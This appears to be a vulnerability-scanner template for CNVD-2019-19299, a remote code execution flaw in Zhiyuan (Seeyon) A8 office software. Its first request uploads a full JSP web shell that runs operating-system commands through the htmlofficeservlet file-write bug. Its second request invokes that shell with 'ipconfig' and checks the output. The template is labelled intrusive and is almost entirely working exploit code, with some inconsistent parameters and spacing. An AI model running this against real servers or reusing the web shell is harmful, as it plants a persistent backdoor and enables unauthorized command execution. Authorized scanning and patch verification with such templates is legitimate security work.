## id: CNVD-2019-19299
## name: Zhiyuan A8 - Remote Code Execution
## author: hack007x
## severity: critical
## tags: cnvd2019,cnvd,zhiyuan,rce,intrusive,vuln
## description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
## cvss-score: 10
## reference: https://www.cxyzjd.com/article/guangying177/110177339
## reference: https://github.com/sectestt/CNVD-2019-19299
## verification: true

POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{random_str(8)}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{random_str(8)}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce


#@ matcher: status_code == 200

---

GET /seeyon/test123456.jsp?pwd=asasd3344&{{random_str(8)}}=ipconfig HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: status_code == 200
#@ matcher: body contains "htmoffice operate"
#@ matcher: body contains "Windows IP"





# @VEIL-STAMP: 3cbf376b46b8dbea7530ca0282f1f4a4d45d9f945b5b37672a258a0e6544df59
